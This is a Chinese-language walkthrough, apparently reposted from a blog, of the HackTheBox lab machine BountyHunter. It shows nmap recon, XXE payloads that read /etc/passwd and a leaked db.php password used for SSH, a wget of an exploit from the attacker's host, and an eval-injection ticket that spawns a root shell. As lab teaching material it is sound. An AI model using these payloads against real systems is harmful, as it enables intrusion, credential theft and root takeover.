HackTheBox-BountyHunter

admin
admin
admin
138674
文章
114
评论
2023年3月8日09:53:22评论22 views字数 10845阅读36分9秒阅读模式

title: HackTheBox-BountyHunter author: Mosaic Theory layout: true categories: 漏洞实验 tags:

  • • 打靶日记

An egg, if cracked from the outside, is destined to be eaten. If you peck it open, it could be an eagle.

一只蛋,如果从外面被敲开,注定只能被吃掉。如果从里面啄开,说不定是只鹰。

HackTheBox-BountyHunter:

Recon:

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 08:58:31 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.11.100                                    
Discovered open port 22/tcp on 10.10.11.100 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-17 17:01 CST
Nmap scan report for 10.10.11.100
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.53 seconds

右上角有个按钮,点击后会被引导至此,尝试输入一些东西后也会回显至下方:

HackTheBox-BountyHunter

POST /tracker_diRbPr00f314.php HTTP/1.1
Host: bountyhunters.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 225
Origin: http://bountyhunters.htb
DNT: 1
Connection: close
Referer: http://bountyhunters.htb/log_submit.php

data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M%2BCgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D

后边两个是等于号,应该是被URL编码了:

>> echo PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT50ZXN0PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M+CgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4=|base64 -d  
<?xml  version="1.0" encoding="ISO-8859-1"?>
        <bugreport>
        <title>test</title>
        <cwe>cwe</cwe>
        <cvss>sadsdsa</cvss>
        <reward>100000</reward>
        </bugreport>

可以尝试提交一个恶意XML文件将其进行BASE64编码:

>> cat XXE
<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
  <!ELEMENT bar ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>cwe</cwe>
        <cvss>sadsdsa</cvss>
        <reward>100000</reward>
        </bugreport>
>> base64 -w0 XXE
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBmb28gWyAgCiAgPCFFTEVNRU5UIGJhciBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCIgPl0+CgkJPGJ1Z3JlcG9ydD4KCQk8dGl0bGU+Jnh4ZTs8L3RpdGxlPgoJCTxjd2U+Y3dlPC9jd2U+CgkJPGN2c3M+c2Fkc2RzYTwvY3Zzcz4KCQk8cmV3YXJkPjEwMDAwMDwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pgo=

按CTRL + U 再进行一次URL编码:

HackTheBox-BountyHunter

development用户看起来可以登录,但我无法读取ssh链接密钥,在收集路径信息时候看到了db.php:

[17:47:21] 301 -  323B  - /assets  ->  http://bountyhunters.htb/assets/
[17:47:21] 403 -  282B  - /assets/
[17:47:29] 301 -  320B  - /css  ->  http://bountyhunters.htb/css/
[17:47:30] 200 -    0B  - /db.php
[17:47:40] 200 -   25KB - /index.php
[17:47:40] 200 -   25KB - /index.php/login/
[17:47:42] 403 -  282B  - /js/
[17:47:58] 301 -  326B  - /resources  ->  http://bountyhunters.htb/resources/
[17:47:58] 200 -    3KB - /resources/
[17:48:00] 403 -  282B  - /server-status/
[17:48:00] 403 -  282B  - /server-status
>> cat XXE
<?xml version="1.0" encoding="ISO-8859-1"?>
  <!DOCTYPE foo [  
  <!ELEMENT bar ANY >
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php" >]>
        <bugreport>
        <title>&xxe;</title>
        <cwe>cwe</cwe>
        <cvss>sadsdsa</cvss>
        <reward>100000</reward>
        </bugreport>
>> base64 -w0 XXE
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBmb28gWyAgCiAgPCFFTEVNRU5UIGJhciBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9L3Zhci93d3cvaHRtbC9kYi5waHAiID5dPgoJCTxidWdyZXBvcnQ+CgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M+CgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4K
>> curl -X POST -d "data=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI/PgogIDwhRE9DVFlQRSBmb28gWyAgCiAgPCFFTEVNRU5UIGJhciBBTlkgPgogIDwhRU5USVRZIHh4ZSBTWVNURU0gInBocDovL2ZpbHRlci9jb252ZXJ0LmJhc2U2NC1lbmNvZGUvcmVzb3VyY2U9L3Zhci93d3cvaHRtbC9kYi5waHAiID5dPgoJCTxidWdyZXBvcnQ%2bCgkJPHRpdGxlPiZ4eGU7PC90aXRsZT4KCQk8Y3dlPmN3ZTwvY3dlPgoJCTxjdnNzPnNhZHNkc2E8L2N2c3M%2bCgkJPHJld2FyZD4xMDAwMDA8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4K" http://bountyhunters.htb/tracker_diRbPr00f314.php
If DB were ready, would have added:
<table>
  <tr>
    <td>Title:</td>
    <td>PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=</td>
  </tr>
  <tr>
    <td>CWE:</td>
    <td>cwe</td>
  </tr>
  <tr>
    <td>Score:</td>
    <td>sadsdsa</td>
  </tr>
  <tr>
    <td>Reward:</td>
    <td>100000</td>
  </tr>
</table>
>> echo PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=|base64 -d
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
>> ssh [email protected]          
The authenticity of host '10.10.11.100 (10.10.11.100)' can't be established.
ED25519 key fingerprint is SHA256:p7RCN4B2AtB69d0vE1LTmg0lRRlnsR1fxArJ+KNoNFQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.100' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
development@bountyhunter:~$ cat user.txt 
cd........................................

Elevated privileges number one:

development@bountyhunter:~$ wget http://10.10.16.7/CVE-2021-2043.py
--2022-05-17 10:03:41--  http://10.10.16.7/CVE-2021-2043.py
Connecting to 10.10.16.7:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘CVE-2021-2043.py’

CVE-2021-2043.py                    100%[=================================================================>]   3.37K  --.-KB/s    in 0.1s    

2022-05-17 10:03:42 (22.6 KB/s) - ‘CVE-2021-2043.py’ saved [3448/3448]

development@bountyhunter:~$ chmod +x ./CVE-2021-2043.py 
development@bountyhunter:~$ ./CVE-2021-2043.py 
# id
uid=0(root) gid=0(root) groups=0(root),1000(development)

Elevated privileges number two:

development@bountyhunter:~$ sudo -l
Matching Defaults entries for development on bountyhunter:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User development may run the following commands on bountyhunter:
    (root) NOPASSWD: /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
development@bountyhunter:/opt/skytrain_inc$ cat ticketValidator.py 
#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**""").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**"""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

这个脚本看起来在判断读取的ticket变量,而ticket变量是从.md文件中读出来的:

development@bountyhunter:/opt/skytrain_inc$ ls
invalid_tickets  ticketValidator.py
development@bountyhunter:/opt/skytrain_inc$ cd invalid_tickets/
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$ ls
390681613.md  529582686.md  600939065.md  734485704.md
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$ cat 390681613.md 
# Skytrain Inc
## Ticket to New Haven
__Ticket Code:__
**31+410+86**
##Issued: 2021/04/06
#End Ticket
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$ cat 529582686.md 
# Skytrain Inc
## Ticket to Bridgeport
**32+110+43**
##Issued: 2021/04/06
#End Ticket
development@bountyhunter:/opt/skytrain_inc/invalid_tickets$ 

好像在做加法运算?

development@bountyhunter:/opt/skytrain_inc$ python3 ticketValidator.py
Please enter the path to the ticket file.
invalid_tickets/529582686.md
Destination: Bridgeport
Invalid ticket.
development@bountyhunter:/opt/skytrain_inc$ python3 ticketValidator.py
Please enter the path to the ticket file.
/opt/skytrain_inc/invalid_tickets/529582686.md 
Destination: Bridgeport
Invalid ticket.
development@bountyhunter:/opt/skytrain_inc$ 

读取票据什么也不执行,只显示票据有效无效,再看代码只要除以7余4,并且大于100就会返回给main函数提示有效票据:

            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**"""))
                if validationNumber > 100:
                    return True
                else:
                    return False

eval函数看起来没什么过滤:

# Skytrain Inc
## Ticket to Bridgeport
__Ticket Code:__
**32+110+44+__import__('os').system('bash')**
##Issued: 2021/04/06
#End Ticket
development@bountyhunter:/opt/skytrain_inc$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py 
Please enter the path to the ticket file.
/home/development/test.md
Destination: Bridgeport
root@bountyhunter:/opt/skytrain_inc# cat /root/root.txt 
1e.....................................


原文始发于微信公众号(老鑫安全):HackTheBox-BountyHunter

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月8日09:53:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HackTheBox-BountyHunterhttps://cn-sec.com/archives/1242651.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息